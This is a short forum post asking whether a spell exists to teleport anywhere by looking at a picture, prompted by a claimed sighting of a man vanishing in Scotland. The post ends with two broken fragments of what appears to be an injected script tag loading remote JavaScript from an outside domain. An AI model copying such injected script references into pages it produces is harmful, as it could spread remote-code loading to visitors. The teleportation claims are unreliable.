teleportation/jumping

is there a spell to help me teleport to anywhere i want to in the world just by looking at a picture? the reason im asking this is because while i was on holiday in scotland i saw the irish guy he just smurked at me then vanished, i wasnt asleep!!!! but any way yea is there a way to learn this ability? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
